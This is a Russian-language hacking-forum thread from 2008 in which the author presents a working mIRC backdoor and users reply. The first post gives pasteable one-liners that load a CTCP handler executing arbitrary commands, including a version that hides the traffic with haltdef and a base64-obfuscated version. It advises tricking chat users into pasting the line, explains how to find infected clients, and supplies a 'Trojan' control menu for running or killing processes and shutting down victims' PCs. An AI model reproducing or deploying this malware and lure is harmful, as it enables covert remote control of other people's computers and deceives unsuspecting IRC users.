ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > ИНФО > Статьи
Перезагрузить страницу mirc backdoor
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

mirc backdoor
  #1  
Старый 28.04.2008, 12:55
CrazyStudentS_Mi}{
Постоянный
Регистрация: 04.07.2007
Сообщений: 827
Провел на форуме:
2504528

Репутация: 882


Thumbs up mirc backdoor
Интернет кишит статьями о том что можно заразить mirc клиент простейшим бэкдором, который будет работать через ctcp запросы, везде он описывается так:
Код:
 //write conf.mrc ctcp 1:*:?:$1- | Load -rs conf.mrc
Это должна набрать наша жертва, тоесть создается файл-скрипт и подгружается в клиент.Но есть один огромный минус такого бэкдора - все наши ctcp запросы будут палиться в статусе. Как же этого избежать? Если покопаться в хэлпе то нетрудно найти алиас haltdef блокирующий стандартный ответ на вызванную команду\алиас\функцию.

Чуть чуть поэкпериментировав пришли к такому бэкдору
Код:
//write config.mrc ctcp ^*:*:*: { haltdef | $1- } | //Load -rs config.mrc
Но для человека хоть чуточку понимающего в скриптинге\кодинге покажется опасной такая строка.
Лучше просто обходить бдительных людей стороной или брать их на слабо )

Благо mirc богат своими функциями и позволяет кодировать команды. В результате имеем такой код бэкдора
Код:
//write conf.mrc $decode(Y3RjcCBeKjoqOio6IHsgaGFsdGRlZiB8ICQxLSB9,m) | load -rs conf.mrc
Такое кажется втюхать соседям по чату труднее, но это только кажется, ведь все проявляют интерес что же это, можнопросто написать это на канале и найдутся те кто посмотрят, что она выполняет.
После того как вы попестрите этим сообщением нужно собирать первые плоды - например ctcp запрос на канал, который выявит заразившихся:
Код:
 /ctcp #chan /ping $me
После сбора урожая в отдельный текстовичок можно приступить к работе с конкретными особями.
Вставим этот код в Скрипты(Alt+R)->Меню->Приват
Код:
Троян
.выполнить:/ctcp $$1 $$?="ВВеди чего хочешь делать"
.запуск процесса:/ctcp $$1 /run $$?="ВВеди название или путь к процессу"
.остановка процесса:/ctcp $$1 /run taskkill /F /IM $$?="ВВеди название или путь к процессу"
.смена ника:/ctcp $$1 /nick $$?="ВВеди ник"
.зайти на канал:/ctcp $$1 /join $$?="ВВеди канал"
.покинуть канал:/ctcp $$1 /part $$?="ВВеди канал"
.сказать:/ctcp $$1 /say $$?="Что сказать?"
.вырубить винду:/ctcp $$1 /run exitwindows
.перезагрузить комп:/ctcp $$1 /run shutdown -r -f -m
Удачного веселья!
 
Ответить с цитированием

  #2  
Старый 28.04.2008, 13:40
elimS2
Постоянный
Регистрация: 21.03.2008
Сообщений: 400
Провел на форуме:
1606680

Репутация: 367
Отправить сообщение для elimS2 с помощью ICQ
По умолчанию
вообще-то если ты такой бекдор успешно кому-то впарил, то тут уже можно и троян впаривать полноценный, главное знать хорошо командную строку. decode по умолчанию в мирке отключен, потому его сначала стоит включить
 
Ответить с цитированием

  #3  
Старый 28.04.2008, 19:59
CrazyStudentS_Mi}{
Постоянный
Регистрация: 04.07.2007
Сообщений: 827
Провел на форуме:
2504528

Репутация: 882


По умолчанию
Цитата:
Сообщение от c411k  
ебаа ты нам открыл глаза, боян шопездец.

заметь тут написано что тема боян, но в нее внесен важный новый аспект - отсутствие палевности твоего присутствия
 
Ответить с цитированием

  #4  
Старый 03.05.2008, 07:54
47726573684e
Новичок
Регистрация: 26.04.2008
Сообщений: 11
Провел на форуме:
15580

Репутация: 0
По умолчанию
Хы а кто миркой пользуеться? Лично я давно юзаю MegaIrc тама токого не катит ...
 
Ответить с цитированием

  #5  
Старый 03.05.2008, 11:32
CrazyStudentS_Mi}{
Постоянный
Регистрация: 04.07.2007
Сообщений: 827
Провел на форуме:
2504528

Репутация: 882


По умолчанию
Цитата:
Сообщение от 47726573684e  
Хы а кто миркой пользуеться? Лично я давно юзаю MegaIrc тама токого не катит ...

сам mirc юзает минимальное количество людей, зато его производные и зточенные под себя скрипты юзает более половины пользователей IRC
 
Ответить с цитированием

  #6  
Старый 03.05.2008, 11:43
AdReNa1!Ne
Участник форума
Регистрация: 24.05.2007
Сообщений: 229
Провел на форуме:
2308963

Репутация: 309
Отправить сообщение для AdReNa1!Ne с помощью ICQ
По умолчанию
Кстати во многих крупных ирц сетях (например dogm.net) стоит фильтр на такое. Так что требуется более извращенный метод))
 
Ответить с цитированием

  #7  
Старый 03.05.2008, 11:45
elimS2
Постоянный
Регистрация: 21.03.2008
Сообщений: 400
Провел на форуме:
1606680

Репутация: 367
Отправить сообщение для elimS2 с помощью ICQ
По умолчанию
/me использует нулевой мирк с своими написаными сверху скриптами
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Какие есть варианты для незаметного встраивания backdoor в Joomla? aquam Сценарии/CMF/СMS 2 12.03.2008 02:34
VM WARE BackDoor и палево ? jsncrp Анонимность 2 09.02.2008 20:08
mIRC! RAZIELE Болталка 8 14.12.2005 16:16
Анонимность в Mirc foreva Чужие Статьи 0 08.02.2005 16:16



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ